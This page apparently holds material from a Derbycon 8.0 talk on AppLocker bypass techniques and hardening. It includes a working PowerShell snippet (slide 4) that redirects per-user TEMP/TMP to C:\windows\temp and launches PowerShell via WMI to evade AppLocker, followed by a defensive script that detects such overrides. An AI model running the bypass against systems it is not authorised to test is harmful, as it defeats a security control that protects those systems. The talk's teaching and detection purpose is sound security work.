App-o-Lockalypse now!


Slides from session at Derbycon 8.0.
Description:
Want to get a good overview of AppLocker and the different AppLocker bypasses, and at the same time learn how defenders can harden their environments to prevent them? Then this is a talk you don't want to miss. This talk covers a large number of bypass techniques and shows how to harden AppLocker to make it even harder to bypass, helping you either start or avoid an App-o-Lockalypse.



  1. Can also use Mklink /H
  2. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)
  3. https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0
  4. Slide 4 (PowerShell):

```powershell
# Save the current per-user TEMP/TMP so they can be restored afterwards
$CurrTemp = $env:temp
$CurrTmp  = $env:tmp
$TEMPBypassPath = "C:\windows\temp"
$TMPBypassPath  = "C:\windows\temp"

# Point the user's TEMP/TMP (HKCU\Environment) at the bypass path
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp  -Value "$TEMPBypassPath"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath"

# Start a new PowerShell process via WMI, then wait for it to come up
Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell"
sleep 5

# Set it back
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp  -Value $CurrTmp
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp
```
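As an added defender-side check (not part of the Derbycon slides), the following PowerShell audits the current user's HKCU:\Environment TEMP/TMP values and flags any that point outside the user's profile, which is the state the slide 4 snippet creates while it runs. The function and parameter names are my own.

```powershell
# Added defensive audit, not from the slides: report per-user TEMP/TMP
# overrides that point outside the user's profile (e.g. under C:\Windows).
function Test-UserTempOverride {
    [CmdletBinding()]
    param(
        # Registry key holding the per-user environment block (as used on slide 4)
        [string]$EnvKey = 'HKCU:\Environment',
        # Roots a user-controlled TEMP/TMP would normally live under
        [string[]]$ExpectedRoots = @($env:USERPROFILE, $env:LOCALAPPDATA)
    )

    $findings = foreach ($name in 'TEMP', 'TMP') {
        $raw = (Get-ItemProperty -Path $EnvKey -Name $name -ErrorAction SilentlyContinue).$name
        if (-not $raw) { continue }   # value absent: nothing to assess

        # REG_EXPAND_SZ values may still contain %USERPROFILE% etc.; expand before comparing
        $expanded = [Environment]::ExpandEnvironmentVariables($raw)
        $inProfile = $ExpectedRoots |
            Where-Object { $_ -and $expanded.StartsWith($_, 'OrdinalIgnoreCase') }

        [pscustomobject]@{
            Variable   = $name
            Value      = $expanded
            Suspicious = -not [bool]$inProfile   # true when TEMP/TMP left the profile
        }
    }
    $findings
}

# Example run: a row with Suspicious = True warrants a closer look at who changed it
Test-UserTempOverride | Format-Table -AutoSize
```

Run it under the account being assessed, since HKCU is per user; a scheduled run feeding the output into your log pipeline turns it into a simple periodic detection.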
